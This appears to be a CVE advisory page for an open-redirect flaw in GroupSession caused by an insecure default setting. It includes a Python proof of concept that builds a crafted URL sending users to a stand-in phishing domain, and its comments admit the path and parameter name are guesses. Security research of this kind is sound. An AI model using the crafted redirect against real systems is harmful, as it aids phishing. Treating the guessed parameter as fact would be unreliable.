Security Vulnerability Report
CVE-2025-64781 CVSS 4.7 MEDIUM

Published: 2025-12-12 05:16:12
Last Modified: 2026-02-17 15:14:10

Description

In GroupSession Free edition prior to ver5.7.1, GroupSession byCloud prior to ver5.7.1, and GroupSession ZION prior to ver5.7.1, "External page display restriction" is set to "Do not limit" in the initial configuration. With this configuration, the user may be redirected to an arbitrary website when accessing a specially crafted URL.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVSS Vector (4.0, secondary): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N (base score 5.1, MEDIUM)
Weakness: CWE-1188 (Initialization of a Resource with an Insecure Default)

Configurations (Affected Products)

cpe:2.3:a:groupsession:groupsession:*:*:*:*:bycloud:*:*:* - VULNERABLE
cpe:2.3:a:groupsession:groupsession:*:*:*:*:free:*:*:* - VULNERABLE
cpe:2.3:a:groupsession:groupsession:*:*:*:*:zion:*:*:* - VULNERABLE
GroupSession Free edition < 5.7.1
GroupSession byCloud < 5.7.1
GroupSession ZION < 5.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64781 PoC - GroupSession Open Redirect
# Target: GroupSession Free/Cloud/ZION < v5.7.1
# Attack Type: Open Redirect (Phishing)
#
# NOTE: the advisory only states that the default "External page display
# restriction" setting of "Do not limit" allows redirection to an arbitrary
# site via a crafted URL. The path and the "redirect" parameter name below are
# this PoC's assumptions, not values confirmed by the vendor or JVN advisory.
# Mitigation: upgrade to 5.7.1 or change the setting away from "Do not limit".
import requests
import urllib.parse

TARGET_HOST = "http://localhost:8080"  # Replace with actual target
GSESSION_PATH = "/gsession/main.do"


def generate_malicious_url(redirect_target):
    """Generate malicious URL with open redirect payload"""
    params = {"redirect": redirect_target}
    query_string = urllib.parse.urlencode(params)
    malicious_url = f"{TARGET_HOST}{GSESSION_PATH}?{query_string}"
    return malicious_url


def test_open_redirect():
    """Test for open redirect vulnerability"""
    # Malicious redirect target (attacker-controlled site)
    evil_domain = "http://malicious-phishing-site.com"
    # Generate exploit URL
    exploit_url = generate_malicious_url(evil_domain)
    print(f"[*] Target: {TARGET_HOST}")
    print(f"[*] Exploit URL: {exploit_url}")
    try:
        # Send request without following redirects so the Location header is visible
        response = requests.get(exploit_url, allow_redirects=False)
        # requests uses a case-insensitive header dict, so one lookup is enough
        redirect_location = response.headers.get("Location")
        if redirect_location:
            print("[!] Redirect detected")
            print(f"[*] Redirects to: {redirect_location}")
            # Verify that the redirect leaves the application for the external domain
            if evil_domain in redirect_location:
                print("[!] VULNERABLE: Redirects to attacker-controlled domain")
                return True
            # A redirect that stays on the original host is not an open redirect
            print("[-] Redirect target is not the external domain; likely restricted")
            return False
        print("[-] No redirect detected or protected")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-64781 - GroupSession Open Redirect PoC")
    print("=" * 60)
    test_open_redirect()

References

https://groupsession.jp/info/info-news/security20251208 (Vendor Advisory)
https://jvn.jp/en/jp/JVN19940619/ (Third Party Advisory)